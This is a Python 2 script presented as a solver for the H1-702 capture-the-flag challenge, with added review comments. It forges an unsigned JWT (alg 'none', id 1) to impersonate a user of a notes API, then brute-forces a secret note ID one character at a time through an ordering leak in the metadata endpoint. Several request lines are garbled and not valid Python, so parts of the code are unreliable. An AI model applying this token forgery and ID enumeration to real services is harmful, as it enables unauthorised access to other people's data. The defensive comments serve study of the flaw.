H1-702-CTF Solver.
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Copyright 2018 @simps0n
import jwt,requests,json,time,sys
# Base URL that every request path below is appended to. It is empty on the
# page, so the script has no target until a value is filled in.
url = ""
#Create JWT Token with ID 1
#jwt = jwt.encode({'id': '1'}, '', algorithm='none')
# NOTE: this assignment rebinds the name `jwt`, shadowing the jwt module
# imported at the top of the file for everything that follows.
# The first segment decodes to {"alg":"none","typ":"JWT"} and the second to
# {"id":"1"}, i.e. a token that declares no signature algorithm. A verifier
# that pins its accepted algorithms (for example the `algorithms=` allow-list
# of PyJWT's decode) and never accepts "none" rejects such a token.
jwt = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IjEifQ.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
#Epoch from the note with the FLAG!
# Kept as a string because it is compared directly against values taken from
# the decoded API responses (see evaluate() and getNote()).
refValue = "1528911533"
# Candidate characters, tried in this order by bfFlag().
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
def bfFlag():
    """Recover the reference note's ID one character at a time.

    Walks `alphabet` repeatedly, using evaluate() as a before/after signal
    and getNote() as the confirmation step; getNote() returning False clears
    `killswitch` and ends the outer loop. Prints a progress line per
    candidate and the elapsed time at the end. Returns None.

    NOTE(review): the page lost all indentation, so the nesting below is a
    reconstruction and should be confirmed against the original gist.

    Defender's view: the search only works if the metadata listing reveals
    where a caller-chosen ID sorts relative to the target note (presumably
    the listing is ordered by note ID). Returning metadata in an order that
    does not depend on secret IDs removes that signal.
    """
    start = time.time()
    # Prefix of the ID confirmed so far.
    bfID = ''
    # Last candidate character for which evaluate() returned True.
    temp = ''
    # True once at least one candidate in the current pass evaluated True.
    toKeep = False
    # Loop flag: stays True until getNote() reports a match by returning False.
    killswitch = True
    while killswitch:
        for char in list(alphabet):
            # "\r" returns the cursor to column 0 so each progress line
            # overwrites the previous one.
            sys.stdout.write(">> Checking Value: "+bfID+char+" ("+str(len(bfID))+")"+"\r")
            #Avoid time issues
            # NOTE(review): no statement follows the comment above on the page;
            # whatever it referred to is not visible here.
            #Check the current ID postion After/Before and keep the last "before" char temporarily
            if evaluate():
                temp = char
                toKeep = True
            #ID position is after the reference Epoch so the last test char (temp) is to keep
            elif toKeep:
                #Validate the if the over char is the one!
                killswitch = getNote(bfID+char)
                # NOTE(review): how many of the following statements belong to
                # this `if` cannot be recovered from the page; all three are
                # nested here only so that the block parses.
                if not killswitch:
                    #Update bfID with last known "before" char and check note
                    bfID += temp
                    killswitch = getNote(bfID)
                    toKeep = False
    end = time.time()
    timetaken = end - start
    # Python 2 print statement, as in the rest of the file.
    print ">> Found it in: "+str(timetaken)
def evaluate():
    """Tell whether the reference epoch is anywhere but first in the listing.

    Fetches the epochs list via getNotesMetadata() and looks up refValue in
    it. Returns False when refValue sits at index 0 (the author's comments
    read this as "new note is after") and True otherwise ("new note is
    before"). list.index raises ValueError if refValue is not in the list.
    """
    position = getNotesMetadata().index(refValue)
    return position != 0
def getNotesMetadata():
    """Request the notes metadata and return its 'epochs' entry.

    Sends a GET to the getNotesMetadata RPC method with the module-level
    token in the Authorization header and the v1 Accept type, decodes the
    response body as JSON and returns data['epochs'] (KeyError if absent).
    """
    endpoint = url + '/rpc.php?method=getNotesMetadata'
    request_headers = {
        'Authorization': jwt,
        'Accept': 'application/notes.api.v1+json',
    }
    response = requests.get(endpoint, headers=request_headers)
    return json.loads(response.content)['epochs']
def resetNotes():
    """Call the resetNotes RPC method and decode the JSON reply.

    The decoded reply is stored in a local and not returned, so the function
    returns None.
    """
    headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
    # NOTE(review): the next line is garbled as captured on the page (the call
    # expression in front of the path string is missing) and is not valid
    # Python; the HTTP method used cannot be determined from what is shown.
    rsp ='/rpc.php?method=resetNotes',headers=headers)
    data = json.loads(rsp.content)
    #print data
def createNote(testID):
    """Call the createNote RPC method with a caller-chosen note ID.

    testID is sent as the 'id' field of the JSON body next to a fixed
    placeholder note text. The decoded reply is stored in a local and not
    returned, so the function returns None.
    """
    # Unlike the other helpers, this one asks for the v2 media type.
    headers = {'Authorization': jwt,'Accept':'application/notes.api.v2+json'}
    postBody = {'note':'NotTheNoteYouAreLookingFor...','id':testID}
    # NOTE(review): the next line is garbled as captured on the page (the call
    # expression in front of the path string is missing) and is not valid
    # Python; only the json= and headers= keyword arguments survive.
    rsp ='/rpc.php?method=createNote',json=postBody,headers=headers)
    data = json.loads(rsp.content)
    #print data
def getNote(noteID):
    """Fetch one note by ID and report whether the search should continue.

    Returns False after printing the API data, the note ID and the note text
    when the fetched note's epoch equals refValue; returns True in every
    other case (no epoch in the reply, or a different epoch). The inverted
    sense matches the `killswitch` loop flag in bfFlag().
    """
    request_headers = {
        'Authorization': jwt,
        'Accept': 'application/notes.api.v1+json',
    }
    # noteID is appended to the query string as-is, without URL encoding.
    endpoint = url + '/rpc.php?method=getNote&id=' + noteID
    response = requests.get(endpoint, headers=request_headers)
    note = json.loads(response.content)

    # Guard clause: anything that is not the reference note keeps the loop going.
    if note.get('epoch') == None or note['epoch'] != refValue:
        #print "Flag not Found - Try Harder!"
        return True

    # A parenthesised single expression prints the same text under the
    # Python 2 print statement used elsewhere in the file.
    print(" API Data: " + str(note))
    print(">> Note ID: " + noteID)
    print(">> Note: " + note['note'])
    return False
def main(args):
    """Placeholder entry point: ignores `args` and returns 0.

    Nothing in this body calls bfFlag() or any of the request helpers.
    """
    return 0
# NOTE(review): as captured on the page, the guard only re-imports sys (already
# imported at the top of the file); nothing here calls main() or bfFlag().
if __name__ == '__main__':
    import sys